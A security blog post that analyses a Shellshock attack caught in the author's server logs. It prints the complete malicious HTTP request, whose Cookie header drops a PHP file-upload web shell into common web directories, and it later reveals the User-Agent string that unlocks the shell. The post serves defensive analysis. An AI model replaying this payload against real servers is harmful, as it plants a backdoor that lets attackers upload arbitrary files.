Attack of the Day

This Seems Interesting..

** Standard Warnings Apply **
Let me help you understand..

This one arrived in the log bucket the other day..  Things happen and it got stuffed in the “Drafts” folder for a while and I’m finally getting back around to looking at it.

GET /cgi-bin/php5.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept: */*
Cookie: () { test;}; echo \'<?php if(md5($_SERVER[\"HTTP_USER_AGENT\"]) !== \"49de371511c1de3bde34b0108ec7f129\"){die(\"04030\");} if (isset($_FILES[\"file\"])){ $z = $_FILES[\"file\"][\"name\"]; move_uploaded_file($_FILES[\"file\"][\"tmp_name\"],$z); header(\"Location: $z\"); exit(); }?><html><body><form action=\"<?php echo basename(__FILE__); ?>\" method=\"post\" enctype=\"multipart/form-data\"><label for=\"file\">Filename:</label><input type=\"file\" name=\"file\" id=\"file\"><br><input type=\"submit\" name=\"submit\" value=\"Submit\"></form></body></html>\' > /tmp/z; echo \'cp /tmp/z ~/zpl.php\' >> /tmp/s; echo \'cp /tmp/z ~/docs/zpl.php\' >> /tmp/s ; echo \'cp /tmp/z ~/httpdocs/zpl.php\' >> /tmp/s ; echo \'cp /tmp/z ~/public_html/zpl.php\' >> /tmp/s; echo \'cp /tmp/z ~/www/zpl.php\' >> /tmp/s; echo \'cp /tmp/z ~/html/zpl.php\' >> /tmp/s; echo \'cp /tmp/z ~/htdocs/zpl.php\' >> /tmp/s; echo \'rm /tmp/z\' >> /tmp/s; echo \'rm /tmp/s\' >> /tmp/s; /bin/bash /tmp/s >/dev/null; exit;

What it is?  Same as most of the other crap that rolls though here; someone trying to leverage the shellshock vulnerability.  The average part of this attack is they are using the bash “echo” command to create a PHP file on the server.  Initial drop location is in the /tmp/ directory.  With some additional “echo” commands, an attempt is made to sprinkle the php code to any number of locations that might be accessible via the webserver running on the machine.  Brute force is an approach… 10% of the time it’s 100% awesome, right?

The PHP content is a little interesting:

<?php if(md5($_SERVER[\"HTTP_USER_AGENT\"]) !== \"49de371511c1de3bde34b0108ec7f129\"){die(\"04030\");}

Before anything really happens, they check to see that the md5 checksum of the requesting browser’s User-Agent field is equal to 49de371511c1de3bde34b0108ec7f129. I’m speculating on the intent here, but it appears that they only want to run this thing if it’s being sourced from a specific browser type.  Presumably the person that attempted to drop this file on my site knows what that User Agent should be so that only (s)he can execute this file.

It did make me curious as to what the field might contain, so I consulted the Interwebs to see if I could find an exhaustive list of known User Agents (you never know..)  With some help from my friends at and, I was able to pretty quickly pull together a list of 10k-ish user-agents to test against.  After 5 minutes of typing and .804 seconds of waiting for the script to execute, I was able to see that I didn’t have a match. I then had the brilliant idea that my answer might lie in my Apache access logs.  It did not.  As a last ditch effort, I tried a couple of “MD5 Reverse” sites that leverage large databases and/or rainbow tables..  Nothing there, either.

At this point, you might be thinking this is the low point of the story.  Some new idea will arise, the plot will turn and the code will be revealed!  Nope.  This is more in line with a tragedy: the hero never learns the code.  A bomb hits the building and everyone dies.  The end.

Kind of the end, I guess.  What does this uploaded php file actually do?  It’s a simple form that allows the remote attacker an easy way to upload whatever additional files they’d like to via a webform.  It might look something like this:

Upload Form

Yeah, it’s not pretty but it would work in a pinch…

I’d love to continue this, but it’s far too late on a Friday afternoon to be writing this stuff.  Keep your stuff safe.

EDIT: 12/13/14

I was recently contacted via email by a very helpful individual..  He had noticed the same type of requests hitting his site.  In this particular instance, the attacker successfully dropped zpl.php on the server and then accessed zpl.php.  I felt bad for the guy because he had some cleanup work ahead of him, but I was equally excited.  Why is that?  Because he looked in his apache logs and was able to see someone from France that hit zpl.php with the correct User-Agent.  Without further ado, I present to you the User Agent:

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; AV e5c61164262d401ffb7e6c01805cf560)

A tip of the hat to you, Mr Anonymous Information Donor!  Mystery solved.

2 thoughts on “This Seems Interesting..

Leave a Reply

Your email address will not be published. Required fields are marked *